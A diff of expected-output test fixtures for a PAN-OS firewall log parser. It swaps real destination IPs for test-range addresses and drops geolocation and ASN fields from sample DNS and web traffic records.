@@ -4331,17 +4095,7 @@ "client.port": 47752, "client.user.name": "crusher", "destination.address": "65.55.223.24", - "destination.as.number": 8075, - "destination.as.organization.name": "Microsoft Corporation", "destination.bytes": 902, - "destination.geo.city_name": "Washington", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 38.7095, - "destination.geo.location.lon": -78.1539, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "65.55.223.24", "destination.packets": 1, "destination.port": 40029, @@ -4367,7 +4121,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 15696, + "log.offset": 15655, "network.application": "skype-probe", "network.bytes": 978, "network.community_id": "1:HEEGx0vjlpNA8Pw0s6pBr2v0rpo=", @@ -4431,16 +4185,17 @@ "client.ip": "192.168.0.100", "client.packets": 1, "client.port": 52189, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 141, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", "destination.packets": 1, "destination.port": 53, "event.action": "flow_terminated", 
@@ -4453,7 +4208,7 @@ "event.end": "2012-04-10T04:39:24.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,8.8.8.8,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25349,1,52189,53,0,0,0x0,udp,allow,227,86,141,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25349,1,52189,53,0,0,0x0,udp,allow,227,86,141,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "event.outcome": "success", "event.start": "2012-04-10T04:39:24.000-02:00", "event.timezone": "-02:00", @@ -4464,10 +4219,10 @@ ], "fileset.name": "panos", "input.type": "log", - "log.offset": 16061, + "log.offset": 16020, "network.application": "dns", "network.bytes": 227, - "network.community_id": "1:1CvVfwyezBZcR2u+VcrEzfuQK9s=", + "network.community_id": "1:OzPcYfTB9qZdptdWIWtui31Th2Q=", "network.direction": "outbound", "network.packets": 2, "network.transport": "udp", @@ -4498,12 +4253,12 @@ "panw.panos.virtual_sys": "vsys1", "related.ip": [ "0.0.0.0", - "192.168.0.100", - "8.8.8.8" + "175.16.199.1", + "192.168.0.100" ], "rule.name": "rule1", "server.bytes": 141, - "server.ip": "8.8.8.8", + "server.ip": "175.16.199.1", "server.packets": 1, "server.port": 53, "service.type": "panw", 
@@ -4524,19 +4279,15 @@ "client.packets": 1, "client.port": 59300, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", + "destination.address": "67.43.156.12", + "destination.as.number": 35908, "destination.bytes": 0, - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.12", "destination.packets": 0, "destination.port": 80, "event.action": "flow_started", 
@@ -4549,7 +4300,7 @@ "event.end": "2012-04-10T04:39:54.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25713,1,59300,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "event.original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25713,1,59300,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "event.outcome": "success", "event.start": "2012-04-10T04:39:54.000-02:00", "event.timezone": "-02:00", @@ -4561,10 +4312,10 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 16400, + "log.offset": 16364, "network.application": "web-browsing", "network.bytes": 78, - "network.community_id": "1:YDMNSbru670DK5EMT3E28WFJPz4=", + "network.community_id": "1:p332Xv4lcmlBtHbVIre7h23l+pw=", "network.direction": "outbound", "network.packets": 1, "network.transport": "tcp", @@ -4596,14 +4347,14 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", "server.bytes": 0, - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.packets": 0, "server.port": 80, "service.type": "panw", 
@@ -4627,14 +4378,7 @@ "client.port": 54414, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 0, "destination.port": 53, @@ -4660,7 +4404,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 16764, + "log.offset": 16726, "network.application": "dns", "network.bytes": 73, "network.community_id": "1:K6PPTb7ohj/4wQV86uCrgAF1mcY=", @@ -4725,19 +4469,15 @@ "client.packets": 1, "client.port": 59299, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", + "destination.address": "67.43.156.12", + "destination.as.number": 35908, "destination.bytes": 0, - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.12", "destination.packets": 0, "destination.port": 80, "event.action": "flow_started", 
@@ -4750,7 +4490,7 @@ "event.end": "2012-04-10T04:39:53.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25437,1,59299,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "event.original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25437,1,59299,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "event.outcome": "success", "event.start": "2012-04-10T04:39:53.000-02:00", "event.timezone": "-02:00", @@ -4762,10 +4502,10 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 17117, + "log.offset": 17079, "network.application": "web-browsing", "network.bytes": 78, - "network.community_id": "1:C9009xCOuCuGvMPT4caMCizoYr0=", + "network.community_id": "1:iwp6f2j4DuzqklbsQ3X/ysmCjlM=", "network.direction": "outbound", "network.packets": 1, "network.transport": "tcp", @@ -4797,14 +4537,14 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", "server.bytes": 0, - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.packets": 0, "server.port": 80, "service.type": "panw", 
@@ -4828,14 +4568,7 @@ "client.port": 60399, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 0, "destination.port": 53, @@ -4861,7 +4594,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 17481, + "log.offset": 17441, "network.application": "dns", "network.bytes": 80, "network.community_id": "1:BKNHj3e0QZpWJwLNiG4yqJnbrxk=", @@ -4927,14 +4660,7 @@ "client.port": 59626, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 316, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 2, "destination.port": 53, @@ -4960,7 +4686,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 17834, + "log.offset": 17794, "network.application": "dns", "network.bytes": 482, "network.community_id": "1:RQ3lmwvSayYq24fFbjpDDqDG+Dg=", 
@@ -5026,14 +4752,7 @@ "client.port": 51542, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 121, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 1, "destination.port": 53, @@ -5059,7 +4778,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 18189, + "log.offset": 18149, "network.application": "dns", "network.bytes": 196, "network.community_id": "1:g5ixoTtR3QVz4le7g1L6PZ67CmU=", @@ -5125,14 +4844,7 @@ "client.port": 54182, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 169, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 1, "destination.port": 53, @@ -5158,7 +4870,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 18543, + "log.offset": 18503, "network.application": "dns", "network.bytes": 244, "network.community_id": "1:z0genl/l2JGIJaNTqaSLGCLTlo4=", 
@@ -5224,14 +4936,7 @@ "client.port": 59199, "client.user.name": "crusher", "destination.address": "62.211.68.12", - "destination.as.number": 3269, - "destination.as.organization.name": "Telecom Italia", "destination.bytes": 954, - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "IT", - "destination.geo.country_name": "Italy", - "destination.geo.location.lat": 43.1479, - "destination.geo.location.lon": 12.1097, "destination.ip": "62.211.68.12", "destination.packets": 7, "destination.port": 80, @@ -5257,7 +4962,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 18897, + "log.offset": 18857, "network.application": "web-browsing", "network.bytes": 1548, "network.community_id": "1:cIfWskY1iVpg8gxVVTX1K8A7+MA=", @@ -5323,17 +5028,7 @@ "client.port": 59198, "client.user.name": "crusher", "destination.address": "212.48.10.58", - "destination.as.number": 8660, - "destination.as.organization.name": "Italiaonline S.p.A.", "destination.bytes": 9130, - "destination.geo.city_name": "Assago", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "IT", - "destination.geo.country_name": "Italy", - "destination.geo.location.lat": 45.4087, - "destination.geo.location.lon": 9.1225, - "destination.geo.region_iso_code": "IT-MI", - "destination.geo.region_name": "Milan", "destination.ip": "212.48.10.58", "destination.packets": 10, "destination.port": 80, @@ -5359,7 +5054,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 19272, + "log.offset": 19232, "network.application": "web-browsing", "network.bytes": 10135, "network.community_id": "1:UPWyVvocuULCMUmJlrn6XBha7JE=", 
@@ -5424,19 +5119,15 @@ "client.packets": 18, "client.port": 56856, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", + "destination.address": "67.43.156.12", + "destination.as.number": 35908, "destination.bytes": 555, - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.12", "destination.packets": 3, "destination.port": 80, "event.action": "flow_terminated", 
@@ -5449,7 +5140,7 @@ "event.end": "2012-04-10T04:38:23.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,11964,1,56856,80,0,0,0x200000,tcp,allow,1918,1363,555,21,2012/04/10 04:29:51,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3", + "event.original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,11964,1,56856,80,0,0,0x200000,tcp,allow,1918,1363,555,21,2012/04/10 04:29:51,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3", "event.outcome": "success", "event.start": "2012-04-10T04:29:51.000-02:00", "event.timezone": "-02:00", @@ -5461,10 +5152,10 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 19646, + "log.offset": 19606, "network.application": "web-browsing", "network.bytes": 1918, - "network.community_id": "1:jFqkUdvAr9S/yeKacw5dlE+0/o0=", + "network.community_id": "1:o5dLJ54EAYPujmRFnlgi5qBdlrM=", "network.direction": "outbound", "network.packets": 21, "network.transport": "tcp", @@ -5496,14 +5187,14 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", "server.bytes": 555, - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.packets": 3, "server.port": 80, "service.type": "panw", 
@@ -5527,14 +5218,7 @@ "client.port": 52489, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 0, "destination.port": 53, @@ -5560,7 +5244,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 20028, + "log.offset": 19986, "network.application": "dns", "network.bytes": 80, "network.community_id": "1:dQTHsEW3omlFoTmdZu1fchcTb9c=", @@ -5625,19 +5309,15 @@ "client.packets": 1, "client.port": 59298, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", + "destination.address": "67.43.156.12", + "destination.as.number": 35908, "destination.bytes": 0, - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.12", "destination.packets": 0, "destination.port": 80, "event.action": "flow_started", 
@@ -5650,7 +5330,7 @@ "event.end": "2012-04-10T04:39:53.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26338,1,59298,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "event.original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26338,1,59298,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "event.outcome": "success", "event.start": "2012-04-10T04:39:53.000-02:00", "event.timezone": "-02:00", @@ -5662,10 +5342,10 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 20381, + "log.offset": 20339, "network.application": "web-browsing", "network.bytes": 78, - "network.community_id": "1:BG6Rk6e+H9jRcZHXqRPFG4iA3uU=", + "network.community_id": "1:s7wyS51RPURVN0hpBPCJ/Lberv0=", "network.direction": "outbound", "network.packets": 1, "network.transport": "tcp", @@ -5697,14 +5377,14 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", "server.bytes": 0, - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.packets": 0, "server.port": 80, "service.type": "panw", 
@@ -5728,14 +5408,7 @@ "client.port": 60185, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 0, "destination.port": 53, @@ -5761,7 +5434,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 20745, + "log.offset": 20701, "network.application": "dns", "network.bytes": 76, "network.community_id": "1:eLVg5C7+4Gz+x6GBj4MlJHk/vyk=", @@ -5827,14 +5500,7 @@ "client.port": 51817, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 0, "destination.port": 53, @@ -5860,7 +5526,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 21098, + "log.offset": 21054, "network.application": "dns", "network.bytes": 76, "network.community_id": "1:2v1FAVArMu9Fw0rZTZH/beAYGjs=", 
@@ -5926,17 +5592,7 @@ "client.port": 47752, "client.user.name": "crusher", "destination.address": "65.55.223.31", - "destination.as.number": 8075, - "destination.as.organization.name": "Microsoft Corporation", "destination.bytes": 0, - "destination.geo.city_name": "Washington", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 38.7095, - "destination.geo.location.lon": -78.1539, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "65.55.223.31", "destination.packets": 0, "destination.port": 40043, @@ -5962,7 +5618,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 21451, + "log.offset": 21407, "network.application": "skype-probe", "network.bytes": 186, "network.community_id": "1:2fa34ze5XsRR97Shg/2DWoWt57c=", 
@@ -6027,19 +5683,15 @@ "client.packets": 1, "client.port": 59297, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", + "destination.address": "67.43.156.12", + "destination.as.number": 35908, "destination.bytes": 0, - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.12", "destination.packets": 0, "destination.port": 80, "event.action": "flow_started", 
@@ -6052,7 +5704,7 @@ "event.end": "2012-04-10T04:39:52.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25543,1,59297,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "event.original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25543,1,59297,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "event.outcome": "success", "event.start": "2012-04-10T04:39:52.000-02:00", "event.timezone": "-02:00", @@ -6064,10 +5716,10 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 21817, + "log.offset": 21773, "network.application": "web-browsing", "network.bytes": 78, - "network.community_id": "1:Sa+u435/AIAAeEelFduJmiGLOv0=", + "network.community_id": "1:rIUUZipsjZe9D+20GocGgeotUX8=", "network.direction": "outbound", "network.packets": 1, "network.transport": "tcp", @@ -6099,14 +5751,14 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", "server.bytes": 0, - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.packets": 0, "server.port": 80, "service.type": "panw", 
@@ -6130,14 +5782,7 @@ "client.port": 52537, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 0, "destination.port": 53, @@ -6163,7 +5808,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 22181, + "log.offset": 22135, "network.application": "dns", "network.bytes": 82, "network.community_id": "1:Uym9anPFBcnC+VaX8dVhkzw/pgg=", @@ -6229,14 +5874,7 @@ "client.port": 53155, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 0, "destination.port": 53, @@ -6262,7 +5900,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 22534, + "log.offset": 22488, "network.application": "dns", "network.bytes": 82, "network.community_id": "1:BWJpN5ucpEKzwxBd0yrkows1+X4=", 
@@ -6328,14 +5966,7 @@ "client.port": 59197, "client.user.name": "crusher", "destination.address": "62.211.68.12", - "destination.as.number": 3269, - "destination.as.organization.name": "Telecom Italia", "destination.bytes": 906, - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "IT", - "destination.geo.country_name": "Italy", - "destination.geo.location.lat": 43.1479, - "destination.geo.location.lon": 12.1097, "destination.ip": "62.211.68.12", "destination.packets": 7, "destination.port": 80, @@ -6361,7 +5992,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 22887, + "log.offset": 22841, "network.application": "web-browsing", "network.bytes": 1487, "network.community_id": "1:k2B753fAG7GMJoQhAbMrDsOfDxA=", @@ -6427,14 +6058,7 @@ "client.port": 56995, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 163, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 1, "destination.port": 53, @@ -6460,7 +6084,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 23264, + "log.offset": 23218, "network.application": "dns", "network.bytes": 251, "network.community_id": "1:PkU1rpfXiwvVRig4MJMcDvEUEas=", 
@@ -6526,14 +6150,7 @@ "client.port": 59069, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 0, "destination.port": 53, @@ -6559,7 +6176,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 23618, + "log.offset": 23572, "network.application": "dns", "network.bytes": 76, "network.community_id": "1:BYZjFq0Mi2hPewpUDaO1jY2UNnA=", @@ -6625,14 +6242,7 @@ "client.port": 55697, "client.user.name": "crusher", "destination.address": "205.171.2.25", - "destination.as.number": 209, - "destination.as.organization.name": "CenturyLink Communications, LLC", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "205.171.2.25", "destination.packets": 0, "destination.port": 53, @@ -6658,7 +6268,7 @@ "fileset.name": "panos", "input.type": "log", "labels.captive_portal": true, - "log.offset": 23971, + "log.offset": 23925, "network.application": "dns", "network.bytes": 76, "network.community_id": "1:l0WoNEsuwN4ml47IyB3IhM2NX6A=", 
